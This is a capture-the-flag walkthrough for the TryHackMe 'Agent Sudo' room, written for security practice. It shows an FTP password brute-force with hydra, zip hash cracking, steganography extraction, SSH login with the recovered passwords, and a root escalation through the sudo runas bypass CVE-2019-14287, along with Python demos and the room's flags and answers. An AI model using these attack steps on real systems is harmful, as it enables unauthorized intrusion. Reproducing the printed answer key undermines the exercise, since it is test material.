TryHackMe Agent Sudo CTF Room Walkthrough

  • Target machine IP: 10.10.224.129 (10.10.165.115 on a later deployment; the address changes every time the room is started, so substitute your own)

Enumeration

nmap scan (-sV for service versions, -sC for the default script set, -Pn to skip host discovery, -oN to save the output): nmap -sV -sC -Pn -oN scan.txt 10.10.224.129

  • Q. How many open ports?

    3
    

    From the Nmap scan: 21/tcp (FTP), 22/tcp (SSH) and 80/tcp (HTTP), the three services used in the rest of the walkthrough

  • Q. How do you redirect yourself to the secret page?

    user-agent
    

    Visiting the website shows a page that asks you to use your own codename as the User-Agent to access the site

  • Q. What is the agent name?

    chris
    

    Change the User-Agent header from the browser default (Mozilla/Chrome) to the single letter C; the server then redirects to a page addressed to agent chris
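  • The User-Agent trick above was found by hand; the following is an added example (not part of the original walkthrough) that generalises it: send one request per candidate codename A-Z and report the ones the server singles out with a redirect. It runs against a small in-process mock of the site, constructed here, which redirects only for the codename "C"; the redirect target name agent_C_attention.php is an assumption about the room and not something the page states.

```python
"""Probe an HTTP endpoint with candidate User-Agent values and report which
ones trigger a redirect. Added example; the mock server below stands in for
the target and its secret codename and redirect path are constructed."""
import http.client
import string
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

SECRET_CODENAME = "C"          # the mock site's secret (constructed for this example)


class MockAgentSite(BaseHTTPRequestHandler):
    """Redirects only when the User-Agent is the agent's codename."""

    def do_GET(self):
        ua = self.headers.get("User-Agent", "")
        if ua == SECRET_CODENAME:
            self.send_response(302)
            self.send_header("Location", "/agent_C_attention.php")   # assumed path
            self.end_headers()
        else:
            body = b"Use your own codename as user-agent to access the site"
            self.send_response(200)
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

    def log_message(self, *args):   # keep the example output quiet
        pass


def start_mock_server():
    """Bind the mock to an ephemeral localhost port; return (server, port)."""
    srv = HTTPServer(("127.0.0.1", 0), MockAgentSite)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def probe_user_agents(host, port, candidates, path="/"):
    """Send one GET per candidate User-Agent.

    Returns {user_agent: (status, location)} for every candidate whose
    response is a 3xx redirect, i.e. the ones the server treats specially."""
    hits = {}
    for ua in candidates:
        conn = http.client.HTTPConnection(host, port, timeout=5)
        try:
            conn.request("GET", path, headers={"User-Agent": ua})
            resp = conn.getresponse()
            resp.read()              # drain the body so the connection closes cleanly
            if 300 <= resp.status < 400:
                hits[ua] = (resp.status, resp.getheader("Location"))
        finally:
            conn.close()
    return hits


def find_codename(host, port):
    """Try every single-letter codename; return the redirecting ones."""
    return probe_user_agents(host, port, string.ascii_uppercase)


if __name__ == "__main__":
    server, port = start_mock_server()
    try:
        print(find_codename("127.0.0.1", port))
    finally:
        server.shutdown()
        server.server_close()
```

    Against the real box the same probe_user_agents() call would be pointed at port 80 of the target; a 3xx with a Location header is the signal to follow, and curl -A C -L <url> does the same thing interactively.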

Hash Cracking and Bruteforce

  • Brute-force the FTP login for chris with hydra and the rockyou wordlist:

    hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://10.10.224.129
    

    FTP login details chris:crystal

  • Q. FTP password

    crystal
    
  • Now log in to the FTP service with chris:crystal and download the files:

    ftp 10.10.224.129
    
    # Enter username and password when prompted
    ftp> dir
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    -rw-r--r--    1 0        0             217 Oct 29  2019 To_agentJ.txt
    -rw-r--r--    1 0        0           33143 Oct 29  2019 cute-alien.jpg
    -rw-r--r--    1 0        0           34842 Oct 29  2019 cutie.png
    226 Directory send OK.
    
    # Download everything (mget takes no destination; files land in the current local directory).
    # Run `binary` first so the images are transferred unmodified, and `prompt` to skip the y/n question per file.
    ftp> mget *
    
    
  • After downloading, cat To_agentJ.txt: the note says the login password is hidden in one of the images:

    Dear agent J,
    
    All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
    
    From,
    Agent C
    
  • Use binwalk to look for data embedded in the images (-e also extracts anything it recognises):

    $ binwalk -e cute-alien.jpg
    
    
    DECIMAL       HEXADECIMAL     DESCRIPTION
    --------------------------------------------------------------------------------
    0             0x0             JPEG image data, JFIF standard 1.01
    
    # binwalk recognises nothing beyond the JPEG itself in cute-alien.jpg; that rules out an appended file, not steganography (it is revisited with steghide below)
    
    $ binwalk -e cutie.png
    
    DECIMAL       HEXADECIMAL     DESCRIPTION
    --------------------------------------------------------------------------------
    0             0x0             PNG image, 528 x 528, 8-bit colormap, non-interlaced
    869           0x365           Zlib compressed data, best compression
    34562         0x8702          Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
    34820         0x8804          End of Zip archive, footer length: 22
    
    # cutie.png has a Zip archive appended after the image data, with an encrypted entry To_agentR.txt; binwalk -e writes it to _cutie.png.extracted/8702.zip (named after the hex offset)
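  • As an added example (not from the original walkthrough), the carving step that binwalk performed above done by hand: walk the PNG chunk list to the end of IEND, look for a zip local-file header after it, and read the note inside. The sample PNG, the appended archive and its note are constructed here; the real archive on the box was password-protected, so this sample is left unencrypted and only the carving and the later base64 step are shown.

```python
"""Carve a zip archive appended to a PNG and read the note inside it.
Added example; the PNG, the zip and the note text below are constructed."""
import base64
import io
import re
import struct
import zipfile
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
ZIP_LOCAL_HEADER = b"PK\x03\x04"


def png_chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one PNG chunk: length, type, data, CRC over type+data."""
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", zlib.crc32(ctype + data))


def build_sample(note: bytes) -> bytes:
    """Minimal 1x1 greyscale PNG followed by a zip holding To_agentR.txt (constructed)."""
    png = (PNG_SIGNATURE
           + png_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
           + png_chunk(b"IDAT", zlib.compress(b"\x00\x00"))   # filter byte + one pixel
           + png_chunk(b"IEND", b""))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("To_agentR.txt", note)
    return png + buf.getvalue()


def png_end_offset(blob: bytes) -> int:
    """Walk the chunk list and return the offset just past the IEND chunk."""
    if not blob.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG")
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(blob):
        length, ctype = struct.unpack(">I4s", blob[pos:pos + 8])
        pos += 8 + length + 4          # header, data, CRC
        if ctype == b"IEND":
            return pos
    raise ValueError("IEND chunk not found")


def carve_zip(blob: bytes):
    """Return (offset, bytes) of the first zip local header after the image ends."""
    start = png_end_offset(blob)
    off = blob.find(ZIP_LOCAL_HEADER, start)
    if off < 0:
        raise ValueError("no zip archive appended")
    return off, blob[off:]


def read_note(zip_bytes: bytes, name="To_agentR.txt", pwd=None) -> str:
    """Read one entry from the carved archive (pwd is the zip password, if any)."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return zf.read(name, pwd=pwd).decode()


def decode_quoted_base64(text: str) -> str:
    """Pull the first single-quoted token out of the note and base64-decode it."""
    token = re.search(r"'([A-Za-z0-9+/=]+)'", text).group(1)
    return base64.b64decode(token, validate=True).decode()


if __name__ == "__main__":
    sample = build_sample(b"We need to send the picture to 'QXJlYTUx' as soon as possible!\n")
    off, zbytes = carve_zip(sample)
    print(f"zip archive at offset {off} (0x{off:x})")
    note = read_note(zbytes)
    print(note.strip())
    print("decoded:", decode_quoted_base64(note))
```

    On the real file the offset printed would be 0x8702, matching binwalk, and read_note() would need pwd=b"alien" once the archive password is known.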
    
  • Use zip2john to turn the archive's encryption metadata into a hash that John the Ripper can crack

    zip2john 8702.zip > ziphash.txt    # run inside _cutie.png.extracted/
    
  • Run john on the hash (its default modes find this one; john --show ziphash.txt reprints the result later)

    john ziphash.txt
    

    password: alien

  • Q. Zip file password

    alien
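  • What zip2john and john did above, as an added example (not from the original walkthrough): a wordlist attack against a ZipCrypto-protected archive. Python's standard library can read ZipCrypto entries but cannot write them, so a minimal encryptor for the traditional PKWARE scheme is included to build the sample; the archive, its note and the stand-in wordlist are all constructed here.

```python
"""Dictionary attack on a ZipCrypto (traditional PKWARE) encrypted zip.
Added example; the archive, note and wordlist below are constructed."""
import io
import os
import struct
import zipfile
import zlib

# CRC-32 table used by the ZipCrypto key schedule (same polynomial as zlib)
_CRC_TABLE = []
for _n in range(256):
    _c = _n
    for _ in range(8):
        _c = (_c >> 1) ^ 0xEDB88320 if _c & 1 else _c >> 1
    _CRC_TABLE.append(_c)


class ZipCryptoEncryptor:
    """Key schedule and keystream as described in APPNOTE.TXT (traditional encryption)."""

    def __init__(self, password: bytes):
        self.k0, self.k1, self.k2 = 0x12345678, 0x23456789, 0x34567890
        for b in password:
            self._update(b)

    @staticmethod
    def _crc32_step(crc: int, b: int) -> int:
        return _CRC_TABLE[(crc ^ b) & 0xFF] ^ (crc >> 8)

    def _update(self, b: int) -> None:
        self.k0 = self._crc32_step(self.k0, b)
        self.k1 = ((self.k1 + (self.k0 & 0xFF)) * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = self._crc32_step(self.k2, self.k1 >> 24)

    def encrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for p in data:
            t = self.k2 | 2
            out.append(p ^ (((t * (t ^ 1)) >> 8) & 0xFF))
            self._update(p)          # the keys advance on the plaintext byte
        return bytes(out)


def build_encrypted_zip(name: str, plaintext: bytes, password: bytes) -> bytes:
    """Single-entry, stored (uncompressed) zip whose entry is ZipCrypto-encrypted."""
    crc = zlib.crc32(plaintext)
    # 12-byte encryption header: 11 random bytes plus the CRC's high byte, which is the
    # check byte a decryptor uses to reject most wrong passwords before touching the data.
    header = os.urandom(11) + bytes([(crc >> 24) & 0xFF])
    body = ZipCryptoEncryptor(password).encrypt(header + plaintext)
    fname = name.encode()
    flags, method, dos_time, dos_date = 0x0001, 0, 0, 0x0021   # bit 0 = encrypted; 1980-01-01
    local = struct.pack("<IHHHHHIIIHH", 0x04034B50, 20, flags, method, dos_time, dos_date,
                        crc, len(body), len(plaintext), len(fname), 0) + fname + body
    central = struct.pack("<IHHHHHHIIIHHHHHII", 0x02014B50, 20, 20, flags, method, dos_time,
                          dos_date, crc, len(body), len(plaintext), len(fname),
                          0, 0, 0, 0, 0, 0) + fname
    eocd = struct.pack("<IHHHHIIH", 0x06054B50, 0, 0, 1, 1, len(central), len(local), 0)
    return local + central + eocd


def crack_zip(zip_bytes: bytes, wordlist):
    """Try each candidate the way john's wordlist mode does; return the password whose
    check byte AND CRC-32 both agree with the entry, or None if the list is exhausted."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        name = zf.namelist()[0]
        for cand in wordlist:
            try:
                zf.read(name, pwd=cand.encode())
                return cand
            except (RuntimeError, zipfile.BadZipFile):
                continue   # wrong check byte (255 of 256 bad guesses) or CRC mismatch
    return None


if __name__ == "__main__":
    note = b"Agent C,\n\nWe need to send the picture to 'QXJlYTUx' as soon as possible!\n"
    archive = build_encrypted_zip("To_agentR.txt", note, b"alien")
    wordlist = ["123456", "password", "crystal", "alien", "Area51"]   # stand-in for rockyou
    print(crack_zip(archive, wordlist))
```

    The check byte is why a single wrong guess is rejected after decrypting 12 bytes, and why a one-in-256 false positive still fails on the CRC; john uses the same two tests on the material zip2john copies out of the archive, only far faster.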
    
  • Use the password to unzip the archive and read To_agentR.txt:

    Agent C,
    
    We need to send the picture to 'QXJlYTUx' as soon as possible!
    
    By,
    Agent R
    

    QXJlYTUx looks like base64 (only letters and digits, length a multiple of 4); decoding it with CyberChef or base64 -d gives
    Area51, which turns out to be the steghide passphrase for cute-alien.jpg

  • Q. steg password

    Area51
    
  • Extract the hidden message from cute-alien.jpg with steghide

    steghide extract -sf cute-alien.jpg
    # Enter Area51 as the passphrase
    

    The embedded data is written to message.txt

  • Read message.txt file

    cat message.txt
    

    Output

    Hi james,
    
    Glad you find this message. Your login password is hackerrules!
    
    Don't ask me why the password look cheesy, ask agent R who set this password for you.
    
    Your buddy,
    chris
    
  • Q. Who is the other agent (in full name)?

    james
    
  • Q. SSH password

    hackerrules!
    

Capture The User Flag

  • Log in to the james account over SSH (ssh james@10.10.224.129) with the password hackerrules!

  • The user flag is in james's home directory

    james@agent-sudo:~$ cat user_flag.txt
    b03d975e8c92a7c04146cfa7a5a313c7
    
  • Q. What is the user flag?

    b03d975e8c92a7c04146cfa7a5a313c7
    
  • Copy Alien_autospy.jpg to the attacker's machine with scp

    scp james@10.10.224.129:~/Alien_autospy.jpg .
    
  • A Google reverse image search on the photo returns many results; the room's hint says to use the Fox News one, and the headline of that Fox News article gives the answer

  • Q. What is the incident of the photo called?

    Roswell alien autopsy
    

Privilege Escalation

  • Finding SUID binaries

    find / -perm -u=s -type f 2>/dev/null
    

    /usr/bin/sudo is among the setuid binaries listed, so the next thing to check is what james is allowed to run with it

  • Listing the commands james may run with sudo

    james@agent-sudo:~$ sudo -l
    [sudo] password for james:
    Matching Defaults entries for james on agent-sudo:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
    
    User james may run the following commands on agent-sudo:
        (ALL, !root) /bin/bash
    

    The rule lets james run /bin/bash as any user except root. Searching for "(ALL, !root) /bin/bash" leads to an exploit-db entry for a sudo runas bypass

  • Q. CVE number for the escalation

    CVE-2019-14287
    
  • The exploit's comments explain the trick: sudo's policy check compares the requested uid with the excluded root uid, and -1 is not 0, so the check passes; but setresuid(2) treats -1 (and its unsigned form 4294967295) as "leave the id unchanged", and the id that stays unchanged is sudo's own uid 0. Running the exploit gives a root shell (fixed in sudo 1.8.28)

    james@agent-sudo:~$ sudo -u#-1 /bin/bash
    root@agent-sudo:~#
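  • An added example (not from the original walkthrough and not sudo's code) that models the two steps behind CVE-2019-14287: the runas policy check in sudo before 1.8.28 compared the requested uid against the excluded ones literally, while setresuid(2) ignores -1 and 4294967295. The fixed check rejects those two values before comparing. The passwd lookup table and the helper names are constructed for the illustration.

```python
"""Model of the sudo runas bypass: why -u#-1 passes "(ALL, !root)" and still
lands on uid 0. Added example; this is a simulation, not sudo's source."""

UID_MAX = 0xFFFFFFFF           # uid_t is a 32-bit unsigned integer on Linux
ROOT_UID = 0


def parse_runas(spec: str) -> int:
    """Turn a -u argument into a uid: '#N' is numeric, anything else is a user name."""
    passwd = {"root": 0, "james": 1000, "chris": 1001}   # constructed stand-in for /etc/passwd
    if spec.startswith("#"):
        return int(spec[1:], 10)
    return passwd[spec]


def policy_allows_vulnerable(requested_uid: int, excluded_uids=(ROOT_UID,)) -> bool:
    """'(ALL, !root)' as sudo < 1.8.28 evaluated it: any target is fine unless it is
    literally one of the excluded uids. -1 is not 0, so the check passes."""
    return requested_uid not in excluded_uids


def policy_allows_fixed(requested_uid: int, excluded_uids=(ROOT_UID,)) -> bool:
    """sudo 1.8.28 refuses the ids setresuid() would ignore before comparing."""
    if requested_uid in (-1, UID_MAX):
        return False
    return requested_uid not in excluded_uids


def setresuid_model(current_uid: int, target_uid: int) -> int:
    """Model of setresuid(2): -1 (or UID_MAX, the same bits) means 'do not change'."""
    if target_uid in (-1, UID_MAX):
        return current_uid
    return target_uid & UID_MAX


def run_sudo(runas_spec: str, policy) -> str:
    """Return the uid the command would run as under the given policy check, or 'denied'."""
    uid = parse_runas(runas_spec)
    if not policy(uid):
        return "denied"
    # sudo is setuid root, so the process is uid 0 at the moment it switches identity
    return f"uid={setresuid_model(ROOT_UID, uid)}"


if __name__ == "__main__":
    for spec in ("root", "chris", "#-1", "#4294967295"):
        print(f"{spec:>12}: vulnerable={run_sudo(spec, policy_allows_vulnerable):<9}"
              f" fixed={run_sudo(spec, policy_allows_fixed)}")
```

    The same mismatch is what the real exploit relies on: the policy layer and the kernel interpret -1 differently, and sudo is the process that owns uid 0 in between.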
    
  • Root flags are usually in /root/; reading the file there gives

    root@agent-sudo:/root# cat root.txt
    
    To Mr.hacker,
    
    Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.
    
    Your flag is
    b53a02f55b57d4439e3341834d70c062
    
    By,
    DesKel a.k.a Agent R
    
  • Q. What is the root flag?

    b53a02f55b57d4439e3341834d70c062
    
  • Q. (Bonus) Who is Agent R?

    DesKel
    
